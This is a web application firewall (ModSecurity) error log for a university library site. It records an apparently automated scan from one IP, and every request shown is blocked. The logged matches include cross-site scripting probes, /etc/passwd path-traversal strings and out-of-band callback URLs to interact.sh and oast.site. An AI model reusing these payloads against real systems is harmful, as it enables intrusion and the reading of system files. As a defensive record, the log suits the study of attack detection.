[Tue Aug 29 11:54:09.834369 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:theme: tes\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/contact.php"] [unique_id "ZO158cCo-f0AAApXgaoAAAAU"]
[Tue Aug 29 11:54:11.017615 2023] [:error] [pid 2648] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://www.interact.sh found within TX:1: www.interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1588Co-f0AAApYpm4AAAAa"]
[Tue Aug 29 11:54:11.188409 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:windowTitle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ><!-- found within ARGS:windowTitle: AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp"] [unique_id "ZO1588Co-f0AAAolKfMAAAAe"]
[Tue Aug 29 11:54:12.736770 2023] [:error] [pid 2648] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0fe3zn7rhdm9zf.oast.site found within TX:1: cjmnijtjmimvgniikdb0fe3zn7rhdm9zf.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO159MCo-f0AAApYpnsAAAAa"]
[Tue Aug 29 11:54:14.113740 2023] [:error] [pid 2646] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/></ found within ARGS:s: \\x22/></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO159sCo-f0AAApWY2YAAAAM"]
[Tue Aug 29 11:54:14.171312 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/stageshow/stageshow_redirect.php"] [unique_id "ZO159sCo-f0AAApbURkAAAAh"]
[Tue Aug 29 11:54:14.610695 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:TargetService. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:TargetService: /knowage/servlet/AdapterHTTP?Page=LoginPage</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/knowage/servlet/AdapterHTTP"] [unique_id "ZO159sCo-f0AAAoGFkEAAAAE"]
[Tue Aug 29 11:54:14.679287 2023] [:error] [pid 2656] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:keyword: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/pdf-generator-for-wp/package/lib/dompdf/vendor/dompdf/dompdf/I18N/Arabic/Examples/Query.php"] [unique_id "ZO159sCo-f0AAApgAyMAAAAH"]
[Tue Aug 29 11:54:15.640448 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:id: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/comm.php"] [unique_id "ZO1598Co-f0AAAox7SEAAAAN"]
[Tue Aug 29 11:54:16.696494 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var_filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:var_filename: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/viewrq.php"] [unique_id "ZO15@MCo-f0AAAoUJisAAAAB"]
[Tue Aug 29 11:54:16.706952 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prefix. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:prefix: \\x22><script>alert(document.domain);</script><"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/magmi/web/ajax_gettime.php"] [unique_id "ZO15@MCo-f0AAAo2m-0AAAAA"]
[Tue Aug 29 11:54:20.967495 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:first. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:first: HOVER ME!</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/plugins/address_add/add.php"] [unique_id "ZO15-MCo-f0AAAoGFlQAAAAE"]
[Tue Aug 29 11:54:21.054309 2023] [:error] [pid 2659] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:background. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:background: \\x22><script>alert(document.domain)</script><img src=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/squid.svg"] [unique_id "ZO15-cCo-f0AAApjIMgAAAAm"]
[Tue Aug 29 11:54:21.551256 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:wpbase. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:wpbase: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/navis-documentcloud/js/window.php"] [unique_id "ZO15-cCo-f0AAAoZ6cYAAAAK"]
[Tue Aug 29 11:54:22.882102 2023] [:error] [pid 2660] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >\\x22>< found within ARGS:page: </script>\\x22><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php"] [unique_id "ZO15-sCo-f0AAApk-U4AAAAn"]
[Tue Aug 29 11:54:23.558397 2023] [:error] [pid 2659] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/sap/bc/BSp/sap/menu/fameset.htm"] [unique_id "ZO15-8Co-f0AAApjIM4AAAAm"]
[Tue Aug 29 11:54:25.183594 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:lp-dismiss-notice. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: xxx<img found within ARGS:lp-dismiss-notice: xxx<img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16AcCo-f0AAAqSwgsAAAAN"]
[Tue Aug 29 11:54:26.984201 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16AsCo-f0AAAor7v4AAAAk"]
[Tue Aug 29 11:54:27.104657 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:q: <svg/onload=alert(1)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/addons/"] [unique_id "ZO16A8Co-f0AAAqSwhcAAAAN"]
[Tue Aug 29 11:54:27.581043 2023] [:error] [pid 2649] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16A8Co-f0AAApZHVMAAAAf"]
[Tue Aug 29 11:54:29.747846 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:v. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:v: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/hero-maps-pro/views/dashboard/index.php"] [unique_id "ZO16BcCo-f0AAAqeFOEAAAAx"]
[Tue Aug 29 11:54:30.817940 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:what. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22\\x5c found within ARGS:what: {\\x22call_action\\x22:\\x22x\\x22,\\x22more_data\\x22:\\x22\\x5cu003cscript>alert(document.domain)\\x5cu003c/script>\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16BsCo-f0AAAqWwV4AAAAl"]
[Tue Aug 29 11:54:31.669083 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:page: \\x22><img src onerror=alert(document.domain) x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/members-list/admin/view/user.php"] [unique_id "ZO16B8Co-f0AAApa-EkAAAAg"]
[Tue Aug 29 11:54:32.564709 2023] [:error] [pid 2714] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:filename: filename'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php"] [unique_id "ZO16CMCo-f0AAAqamjUAAAAt"]
[Tue Aug 29 11:54:33.558494 2023] [:error] [pid 2711] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16CcCo-f0AAAqXyPYAAAAq"]
[Tue Aug 29 11:54:34.584426 2023] [:error] [pid 2717] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:var_url: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/ecrire/"] [unique_id "ZO16CsCo-f0AAAqdbmAAAAAw"]
[Tue Aug 29 11:54:34.608420 2023] [:error] [pid 2634] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stack. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stack: \\x0a<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/__nuxt_error"] [unique_id "ZO16CsCo-f0AAApKayAAAAAZ"]
[Tue Aug 29 11:54:35.677302 2023] [:error] [pid 2656] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16C8Co-f0AAApgA0UAAAAH"]
[Tue Aug 29 11:54:35.725690 2023] [:error] [pid 2713] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/adminimize/adminimize_page.php"] [unique_id "ZO16C8Co-f0AAAqZuZgAAAAs"]
[Tue Aug 29 11:54:38.015180 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16DsCo-f0AAApa-FUAAAAg"]
